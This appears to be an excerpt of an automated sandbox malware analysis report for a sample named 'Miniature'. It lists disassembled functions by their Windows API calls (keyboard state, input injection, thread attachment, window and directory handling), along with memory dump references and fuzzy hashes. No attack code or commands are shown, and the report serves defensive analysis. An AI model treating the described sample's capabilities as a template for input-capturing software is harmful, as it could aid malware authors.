                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00C7B5B8
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C7B5D4
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C7B63B
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00C7B68D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                            • Opcode ID: adc27235ad0bcef2b122f4cf817f3debe4b1abf0f20d0c1f37599e43753dc456
                                                                                                                                                                                                                                                                                            • Instruction ID: 0576b12e87f937e73a7bfcba846f5fa3cd4fe42acf09d17a963be58ebd11948e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adc27235ad0bcef2b122f4cf817f3debe4b1abf0f20d0c1f37599e43753dc456
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77313C30940608AEFF388B6588057FEBBA6AF85310F04C22AF5AD961D1C3748F459B91
                                                                                                                                                                                                                                                                                            Function 00CA80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00CA80D4
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00CA814A
                                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00CA815A
                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00CA81C6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6a58563d6002acdc54eef704ac5fe8d04894313d8c3ced0e8dda9ce793368205
                                                                                                                                                                                                                                                                                            • Instruction ID: 904b8fb75e6d64378f387ea4e2c66338c569eff6a180f0457a9873a23e0d88e2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a58563d6002acdc54eef704ac5fe8d04894313d8c3ced0e8dda9ce793368205
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE419E70A00256DFCB11CF98C884FADB7F5FF46318F1440A8EA559B261CB30E94ACB90
                                                                                                                                                                                                                                                                                            Function 00CA2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00CA2187
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C743AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetCurrentThreadId.KERNEL32 ref: 00C743B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C72F00), ref: 00C743BB
                                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 00CA219B
                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00CA21E8
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00CA21EE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d471b6f51b13cf8015c982cf1f4411d65a98b60af85e2dc186608863767bc6aa
                                                                                                                                                                                                                                                                                            • Instruction ID: 6a4dfd441d0c32efe776dcc2d75d6bd0541733162ec7bd01983bbfb1a55106b7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d471b6f51b13cf8015c982cf1f4411d65a98b60af85e2dc186608863767bc6aa
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 483152B1D04119AFCB04DFA9C8C1DEEBBF8EF49308B50846AE516E7211DB719E45DBA0
                                                                                                                                                                                                                                                                                            Function 00C7E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E8E2
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E8F9
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E924
                                                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C7E92F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6e3b478bfb822ad0e04b5f63ebb3d7b9f59f7421967cc890c0ea207e294a3b92
                                                                                                                                                                                                                                                                                            • Instruction ID: d6fdd42f391e5e15ff0954a461a1dc5b0d8a27ee9636f8dda37d25e8e6162dbd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3b478bfb822ad0e04b5f63ebb3d7b9f59f7421967cc890c0ea207e294a3b92
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6621BA73900214EFCB109FA4D981BEEB7F8EF45350F1480A4E915BB241D6709E41D7A1
                                                                                                                                                                                                                                                                                            Function 00CA9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00CA9A5D
                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CA9A72
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00CA9ABA
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00CA9AF0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d06119f649b70b26d5c3f0c489287af7bd777caa5a288bc8ad78f7b75a6e0c6f
                                                                                                                                                                                                                                                                                            • Instruction ID: 7bc1819b3fcf3c3dd9ec027b4ed95c39e4a85ab14420423dc2f0f89a7dcb6ad2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d06119f649b70b26d5c3f0c489287af7bd777caa5a288bc8ad78f7b75a6e0c6f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1721BC35600018AFCF258F94C88AFEE7BB9EB0A314F404066F9168B1B1D7309E50EB60
                                                                                                                                                                                                                                                                                            Function 00C7DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00CADC30), ref: 00C7DBA6
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C7DBB5
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7DBC4
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CADC30), ref: 00C7DC21
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 21f48f17f659602a42cf6e4e945dd08aab90d37f96f2c3c2ac24e35a6cd8825e
                                                                                                                                                                                                                                                                                            • Instruction ID: 420338de664d5a94537ce7dfbd02ff405fddc296fda88bd6a8b87d130cab5862
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f48f17f659602a42cf6e4e945dd08aab90d37f96f2c3c2ac24e35a6cd8825e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E2171705042059F8700DF24C98199ABBF8FE5A368F108A59F4AB872A1D731DE46DB52
                                                                                                                                                                                                                                                                                            Function 00CA321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00CA32A6
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA32C0
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA32CE
                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CA32DC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2b778422c85cb50f990c7bb5118e66907254821a904e427ca324425e5d0d5456
                                                                                                                                                                                                                                                                                            • Instruction ID: 661c0329e1c6816d2bc5aea1715e7997e490ec520c148ae34d32b28729ff07b0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b778422c85cb50f990c7bb5118e66907254821a904e427ca324425e5d0d5456
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B721C431604552AFD7149F24C855FAA7B95EF86318F248258F8278B6D2C771EE81C7D0
                                                                                                                                                                                                                                                                                            Function 00C7825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C796E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C78271,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?), ref: 00C796F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C796E4: lstrcpyW.KERNEL32(00000000,?,?,00C78271,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C79719
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C796E4: lstrcmpiW.KERNEL32(00000000,?,00C78271,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?), ref: 00C7974A
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C7828A
                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C782B0
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C790BB,00000000,?,0000001C,?,?,00000000), ref: 00C782EB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                            • Opcode ID: 406292eb84f1bfdd0f488b647620fd90f6c7a4b07ce02633600475b43656e843
                                                                                                                                                                                                                                                                                            • Instruction ID: 2750745e049dd77c74c58dfa525b9345e478670df30df8bc7405ca3575e0ba7c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 406292eb84f1bfdd0f488b647620fd90f6c7a4b07ce02633600475b43656e843
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0311E63A200741ABCB149F38D849E7E77A9FF45754B50812AFA47C72A0EF31D911D7A0
                                                                                                                                                                                                                                                                                            Function 00CA60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00CA615A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA616C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA6177
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA62B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 70c4a12f15d86efc46583052a00d326c14c82317a80a57ea84827fc807fe3076
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c9173d550f2192201b03844d5791717e2e7f2cf52f88c8acbf9651ae2510183
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70c4a12f15d86efc46583052a00d326c14c82317a80a57ea84827fc807fe3076
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0111D67550021A9ADF20DFA59C85BEF7BBCEF13368F14412AFA21D6081EB70CA41DB60
                                                                                                                                                                                                                                                                                            Function 00C42079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 47907bc0e0af8d0f61e15ff1c791e9daf8e6033f28b12001cc048ddd85804312
                                                                                                                                                                                                                                                                                            • Instruction ID: 87b1b1eaebac8d1053ea9698ce831b9ed46a84ab1f36bbb0d927ff27180e8b36
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47907bc0e0af8d0f61e15ff1c791e9daf8e6033f28b12001cc048ddd85804312
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB0186B26052167EF63126786CC2F6B678DFF413B8B754725F532A11D5DE708D40D160
                                                                                                                                                                                                                                                                                            Function 00C72374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C72394
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C723A6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C723BC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C723D7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a2efda72873a8d5b65cbb40fb6769fd130e74c0db574964e5e977b86d7c51fb7
                                                                                                                                                                                                                                                                                            • Instruction ID: b94a8fd6e3219f9353f75889c9b03cc7ec009c3287d5c7e75ba260b5352d041f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2efda72873a8d5b65cbb40fb6769fd130e74c0db574964e5e977b86d7c51fb7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D11393AD00218FFEB119BA5CD85F9DBB78FB08750F204091EA15B7290D6716F10DB94
                                                                                                                                                                                                                                                                                            Function 00C11AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C11AF4
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C531F9
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C53203
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C5320E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
